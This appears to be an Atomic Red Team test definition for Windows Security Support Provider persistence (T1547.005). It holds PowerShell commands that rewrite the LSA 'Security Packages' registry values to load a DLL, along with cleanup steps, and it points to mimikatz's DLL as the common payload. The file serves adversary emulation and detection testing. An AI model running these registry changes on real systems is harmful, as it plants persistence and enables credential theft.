security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1547.005/T1547.005.yaml
T
Atomic Red Team GUID generator 363cf9a301 Generate GUIDs from job=generate-docs branch=master [skip ci]
2023-08-02 03:23:54 +00:00

42 lines
2.9 KiB
YAML
Raw Permalink Blame History

attack_technique: T1547.005
display_name: 'Boot or Logon Autostart Execution: Security Support Provider'
atomic_tests:
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
description: |
Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
supported_platforms:
- windows
executor:
command: |
$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
$newvalue = "AtomicTest.dll";
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
name: powershell
elevation_required: true
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry
auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
supported_platforms:
- windows
executor:
command: |
$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
$newvalue = "AtomicTest.dll";
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink